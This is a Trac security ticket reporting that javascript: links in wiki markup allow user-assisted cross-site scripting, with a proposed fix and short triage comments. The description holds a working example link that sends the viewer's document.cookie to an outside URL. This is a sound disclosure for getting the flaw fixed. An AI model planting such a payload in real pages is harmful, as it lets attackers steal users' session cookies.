Opened 14 years ago
Last modified 14 years ago
#9557 closed defect
User-assisted XSS risk via javascript: links — at Version 3
Reported by: | Owned by: | ||
---|---|---|---|
Priority: | high | Milestone: | 0.11.8 |
Component: | general | Version: | 0.11-stable |
Severity: | major | Keywords: | security |
Cc: | Branch: | ||
Release Notes: | |||
API Changes: | |||
Internal Changes: |
Description (last modified by )
[javascript://%0Alocation='https://mattmccutchen.net/private/trac-javscript-link?'+encodeURIComponent(document.cookie); Click here to send me your cookies.]
This should be blocked by checking link targets against the same set of safe schemes that the HTML sanitizer uses.
Change History (4)
comment:1 by , 14 years ago
comment:2 by , 14 years ago
Milestone: | → 0.12.1 |
---|---|
Priority: | normal → high |
Severity: | normal → major |
Interesting. Thanks for the report!
Maybe even for 0.11.7.1?
comment:3 by , 14 years ago
Description: | modified (diff) |
---|
And removed the actual link before too many people click on it :)
Note:
See TracTickets
for help on using tickets.
open your door